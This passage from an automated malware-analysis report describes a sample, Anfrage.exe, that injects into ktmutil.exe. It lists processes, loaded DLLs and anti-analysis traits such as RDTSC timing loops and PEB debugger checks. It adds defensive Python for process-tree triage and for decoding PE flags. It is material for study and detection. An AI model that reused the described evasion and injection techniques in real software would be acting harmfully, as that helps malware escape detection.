            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
            Source: C:\Users\user\Desktop\Anfrage.exe | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
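            The process-creation lines above show two launch patterns worth turning into a triage rule: Anfrage.exe starting a second copy of itself with an identical command line, and a binary under Program Files (x86) starting C:\Windows\SysWOW64\ktmutil.exe with no arguments. The Python below is an added example written for this page; it is not Joe Sandbox code and not part of any tool the report names. It parses lines in the layout used on this page (it also accepts the fused form "Anfrage.exeProcess created:", since it splits on the label) and applies three heuristics. The looks_random() threshold (an alphabetic name of 20 or more characters whose case flips on more than 30% of adjacent pairs) is an assumption chosen to match the directory name in this report, not a documented FormBook indicator.

```python
from pathlib import PureWindowsPath

# Constructed input: the three "Process created" lines of this report, transcribed
# with the paths verbatim (link text removed). Fused lines such as
# "Anfrage.exeProcess created:" parse the same way, since we split on the label.
REPORT_PROCESS_LINES = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"',
    r'Source: C:\Users\user\Desktop\Anfrage.exe | Process created: C:\Users\user\Desktop\Anfrage.exe "C:\Users\user\Desktop\Anfrage.exe"',
    r'Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"',
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def parse_process_line(line: str):
    """Split one report line into (parent_path, child_path, command_line), or None."""
    src, label, rest = line.partition("Process created:")
    if not label or "Source:" not in src:
        return None
    parent = src.split("Source:", 1)[1].strip().rstrip("|").strip()
    child, _, cmd = rest.strip().partition(' "')
    return parent, child.strip(), cmd.rstrip('"')


def looks_random(name: str) -> bool:
    """Heuristic (an assumption, not a documented FormBook indicator): a purely
    alphabetic name of 20+ characters whose case flips on more than 30% of
    adjacent character pairs, as the Program Files directory in this report does."""
    if len(name) < 20 or not name.isalpha():
        return False
    flips = sum(1 for a, b in zip(name, name[1:]) if a.isupper() != b.isupper())
    return flips / len(name) > 0.3


def triage_process_lines(lines):
    """Return (rule, parent, child) findings for the launch patterns seen in this report."""
    findings = []
    for line in lines:
        parsed = parse_process_line(line)
        if parsed is None:
            continue
        parent, child, cmd = parsed
        p, c = parent.lower(), child.lower()
        # Same image started again with an identical command line (Anfrage.exe -> Anfrage.exe).
        if p == c and cmd.lower() == c:
            findings.append(("self_spawn", parent, child))
        # OS binary from System32/SysWOW64 started by a parent outside C:\Windows;
        # here the command-line KTM utility ktmutil.exe, launched with no arguments.
        if c.startswith(SYSTEM_DIRS) and p != "unknown" and not p.startswith("c:\\windows\\"):
            findings.append(("system_binary_from_user_parent", parent, child))
        # Parent that lives in a randomly named directory directly under Program Files.
        parts = PureWindowsPath(parent).parts
        if len(parts) >= 3 and "program files" in parts[1].lower() and looks_random(parts[2]):
            findings.append(("random_program_files_dir", parent, child))
    return findings


if __name__ == "__main__":
    for rule, parent, child in triage_process_lines(REPORT_PROCESS_LINES):
        print(f"{rule}: {parent} -> {child}")
```

            Run against the three lines embedded in the block it reports one self_spawn finding for Anfrage.exe and two findings (system_binary_from_user_parent and random_program_files_dir) for the ktmutil.exe launch; the first line, whose parent is "unknown", produces nothing. Feeding it the process tree of another report only requires replacing REPORT_PROCESS_LINES.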
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: powrprof.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wkscli.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: umpdc.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: ktmw32.dll
            Source: C:\Windows\SysWOW64\ktmutil.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Anfrage.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Anfrage.exe | Static file information: File size 1251520 > 1048576
            Source: Anfrage.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: mshtml.pdb source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mrdYGoZBmXi.exe, 00000008.00000000.2402775106.0000000000EDE000.00000002.00000001.01000000.00000009.sdmp (this PDB path identifies mrdYGoZBmXi.exe as Joe Sandbox's own FakeChrome stand-in, not a file authored by the malware; the 8_2 code functions listed above at 0x02F8xxxx-0x02FBxxxx lie well outside that image's 0x00Exxxxx mapping and are consistent with injected code running inside it, which is the process that then launches ktmutil.exe)
            Source: Binary string: wntdll.pdbUGP source: Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Anfrage.exe, Anfrage.exe, 00000007.00000003.2390764590.00000000361DC000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.0000000036390000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2511246780.000000003652E000.00000040.00001000.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2388742992.0000000036024000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000009.00000002.2647332323.0000000003300000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdbGCTL source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ktmutil.pdb source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000002.2484828472.00000000062B9000.00000004.00000020.00020000.00000000.sdmp, mrdYGoZBmXi.exe, 00000008.00000002.2646658528.0000000000838000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: Anfrage.exe, 00000007.00000001.2121368668.0000000000649000.00000020.00000001.01000000.00000007.sdmp
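            The two static PE information lines for Anfrage.exe (Characteristics RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, and DllCharacteristics DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE) carry a contradiction worth checking on any sample: DYNAMIC_BASE requests ASLR, but an image whose base relocations are stripped cannot be rebased, so the loader maps it at its preferred ImageBase regardless of the flag. The Python below is an added example written for this page, not Joe Sandbox code; it decodes both flag words using the header offsets from the PE/COFF specification (DllCharacteristics at offset 70 of the optional header for both PE32 and PE32+, the base-relocation data directory at index 5) and reports whether ASLR can actually take effect. The embedded sample is a constructed headers-only image carrying the same flag values the report lists; it is not the bytes of Anfrage.exe.

```python
import struct

# IMAGE_FILE_HEADER.Characteristics bits (PE/COFF specification)
FILE_CHARACTERISTICS = {
    0x0001: "RELOCS_STRIPPED",
    0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED",
    0x0008: "LOCAL_SYMS_STRIPPED",
    0x0020: "LARGE_ADDRESS_AWARE",
    0x0100: "32BIT_MACHINE",
    0x2000: "DLL",
}

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF specification)
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x1000: "APPCONTAINER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}

IMAGE_DIRECTORY_ENTRY_BASERELOC = 5


def parse_pe_flags(data: bytes) -> dict:
    """Decode Characteristics/DllCharacteristics and judge whether ASLR can work."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _machine, _nsec, _ts, _symptr, _nsym, _optsize, file_chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:            # PE32
        nrva_off, dd_off = 92, 96
    elif magic == 0x20B:          # PE32+
        nrva_off, dd_off = 108, 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    # DllCharacteristics sits at offset 70 in both PE32 and PE32+ optional headers
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    nrva = struct.unpack_from("<I", data, opt + nrva_off)[0]
    reloc_size = 0
    if nrva > IMAGE_DIRECTORY_ENTRY_BASERELOC:
        _rva, reloc_size = struct.unpack_from("<II", data, opt + dd_off + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC)

    file_flags = [name for bit, name in sorted(FILE_CHARACTERISTICS.items()) if file_chars & bit]
    dll_flags = [name for bit, name in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit]
    # The loader can only move an image that carries base relocations; DYNAMIC_BASE
    # on an image with RELOCS_STRIPPED (or an empty .reloc directory) is a dead flag.
    aslr_effective = ("DYNAMIC_BASE" in dll_flags
                      and "RELOCS_STRIPPED" not in file_flags
                      and reloc_size > 0)
    return {
        "file_characteristics": file_flags,
        "dll_characteristics": dll_flags,
        "reloc_directory_size": reloc_size,
        "aslr_effective": aslr_effective,
    }


def build_minimal_pe32(file_chars: int, dll_chars: int, reloc_size: int = 0) -> bytes:
    """Constructed test image: DOS stub, PE signature, COFF and optional header only."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x014C, 0, 0, 0, 0, 224, file_chars)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                      # PE32 magic
    struct.pack_into("<H", opt, 70, dll_chars)                  # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * IMAGE_DIRECTORY_ENTRY_BASERELOC,
                     0x5000 if reloc_size else 0, reloc_size)   # .reloc directory entry
    return dos + b"PE\0\0" + coff + bytes(opt)


# Constructed sample mirroring the flag set this report lists for Anfrage.exe:
# RELOCS_STRIPPED|EXECUTABLE_IMAGE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT_MACHINE = 0x010F
# DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE = 0x8540 (not the real file's bytes).
REPORT_LIKE_SAMPLE = build_minimal_pe32(0x010F, 0x8540)

if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else REPORT_LIKE_SAMPLE
    for key, value in parse_pe_flags(blob).items():
        print(f"{key}: {value}")
```

            Run with a file path it reads that PE; with no argument it decodes the constructed sample, for which aslr_effective comes out False because RELOCS_STRIPPED is set and the relocation directory is empty. The same check on a normally linked executable (relocations present, DYNAMIC_BASE set) returns True.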

            Data Obfuscation

            Source: Yara match File source: 00000007.00000002.2476095227.00000000020FA000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000000.00000002.2122397614.00000000034FA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_10002D20 push eax; ret 0_2_10002D4E
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363927FA pushad ; ret 7_2_363927F9
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3639225F pushad ; ret 7_2_363927F9
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3639283D push eax; iretd 7_2_36392858
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C09AD push ecx; mov dword ptr [esp], ecx 7_2_363C09B6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe Code function: 8_2_02F999D2 pushfd ; iretd 8_2_02F999E6
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe Code function: 8_2_02F8E67C push ebx; ret 8_2_02F8E682
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe Code function: 8_2_02FA060C push ebp; ret 8_2_02FA0619
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe Code function: 8_2_02FABFB8 push ds; iretd 8_2_02FABFD4
            Source: C:\Program Files (x86)\MahiOAnSOdXoeGfiPKCwYFftMQXtvCoQnZEDwBlQYXyRFNrCXYKErIqwginNQsQhdCjNBUkuderaM\mrdYGoZBmXi.exe Code function: 8_2_02F99C11 push edi; retf 8_2_02F99C12
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_0330225F pushad ; ret 9_2_033027F9
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_033027FA pushad ; ret 9_2_033027F9
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_033309AD push ecx; mov dword ptr [esp], ecx 9_2_033309B6
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_0330283D push eax; iretd 9_2_03302858
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028CE7F9 push edi; retf 9_2_028CE7FA
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028CE5C3 pushfd ; iretd 9_2_028CE5CE
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028E088A push edi; iretd 9_2_028E088B
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028C3264 push ebx; ret 9_2_028C326A
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028D51F4 push ebp; ret 9_2_028D5201
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028DDA60 push cs; ret 9_2_028DDBA3
            Source: C:\Windows\SysWOW64\ktmutil.exe Code function: 9_2_028E19DF pushfd ; retf 9_2_028E19E0
            Source: C:\Users\user\Desktop\Anfrage.exe File created: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll
            Source: C:\Users\user\Desktop\Anfrage.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
            Source: C:\Users\user\Desktop\Anfrage.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\Anfrage.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\ktmutil.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Anfrage.exe API/Special instruction interceptor: Address: 3B3FE93
            Source: C:\Users\user\Desktop\Anfrage.exe API/Special instruction interceptor: Address: 273FE93
            Source: C:\Users\user\Desktop\Anfrage.exe RDTSC instruction interceptor: First address: 3B0041C second address: 3B0041C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000E6h 0x00000008 cmp edi, 6ED590EBh 0x0000000e jg 00007F03D4F04CA5h 0x00000014 pop edi 0x00000015 cmp ebx, ecx 0x00000017 jc 00007F03D4EC497Fh 0x00000019 test dx, bx 0x0000001c inc ebp 0x0000001d cmp eax, 66B5E70Fh 0x00000022 inc ebx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Anfrage.exe RDTSC instruction interceptor: First address: 270041C second address: 270041C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 mov edi, 000000E6h 0x00000008 cmp edi, 6ED590EBh 0x0000000e jg 00007F03D4775F55h 0x00000014 pop edi 0x00000015 cmp ebx, ecx 0x00000017 jc 00007F03D4735C2Fh 0x00000019 test dx, bx 0x0000001c inc ebp 0x0000001d cmp eax, 66B5E70Fh 0x00000022 inc ebx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364916A6 rdtsc 7_2_364916A6
            Source: C:\Users\user\Desktop\Anfrage.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nskF5B7.tmp\System.dll
            Source: C:\Users\user\Desktop\Anfrage.exe API coverage: 0.1 %
            Source: C:\Windows\SysWOW64\ktmutil.exe API coverage: 2.0 %
            Source: C:\Windows\SysWOW64\ktmutil.exe Last function: Thread delayed
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405665
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_004060C7 FindFirstFileA,FindClose, 0_2_004060C7
            Source: Anfrage.exe, 00000007.00000002.2484828472.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389278844.00000000062AA000.00000004.00000020.00020000.00000000.sdmp, Anfrage.exe, 00000007.00000003.2389055505.00000000062AA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: Anfrage.exe, 00000007.00000002.2484575388.0000000006248000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`
            Source: C:\Users\user\Desktop\Anfrage.exe API call chain: ExitProcess graph end node graph_0-3753
            Source: C:\Users\user\Desktop\Anfrage.exe API call chain: ExitProcess graph end node graph_0-3939
            Source: C:\Windows\SysWOW64\ktmutil.exe Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\ktmutil.exe Process queried: DebugPort
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364916A6 rdtsc 7_2_364916A6
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364035C0 NtCreateMutant,LdrInitializeThunk, 7_2_364035C0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_10001A5D
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BF626 mov eax, dword ptr fs:[00000030h] 7_2_363BF626
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3645D660 mov eax, dword ptr fs:[00000030h] 7_2_3645D660
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C3616 mov eax, dword ptr fs:[00000030h] 7_2_363C3616
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F1607 mov eax, dword ptr fs:[00000030h] 7_2_363F1607
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363FF603 mov eax, dword ptr fs:[00000030h] 7_2_363FF603
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F9660 mov eax, dword ptr fs:[00000030h] 7_2_363F9660
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_36495636 mov eax, dword ptr fs:[00000030h] 7_2_36495636
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647F6C7 mov eax, dword ptr fs:[00000030h] 7_2_3647F6C7
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364816CC mov eax, dword ptr fs:[00000030h] 7_2_364816CC
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363B76B2 mov eax, dword ptr fs:[00000030h] 7_2_363B76B2
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363BD6AA mov eax, dword ptr fs:[00000030h] 7_2_363BD6AA
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_364536EE mov eax, dword ptr fs:[00000030h] 7_2_364536EE
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3647D6F0 mov eax, dword ptr fs:[00000030h] 7_2_3647D6F0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3644368C mov eax, dword ptr fs:[00000030h] 7_2_3644368C
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F36EF mov eax, dword ptr fs:[00000030h] 7_2_363F36EF
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363ED6E0 mov eax, dword ptr fs:[00000030h] 7_2_363ED6E0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F16CF mov eax, dword ptr fs:[00000030h] 7_2_363F16CF
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363CB6C0 mov eax, dword ptr fs:[00000030h] 7_2_363CB6C0
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_36493749 mov eax, dword ptr fs:[00000030h] 7_2_36493749
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C973A mov eax, dword ptr fs:[00000030h] 7_2_363C973A
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363B9730 mov eax, dword ptr fs:[00000030h] 7_2_363B9730
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363F5734 mov eax, dword ptr fs:[00000030h] 7_2_363F5734
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_3646375F mov eax, dword ptr fs:[00000030h] 7_2_3646375F
            Source: C:\Users\user\Desktop\Anfrage.exe Code function: 7_2_363C3720 mov eax, dword ptr fs:[00000030h] 7_2_363C3720
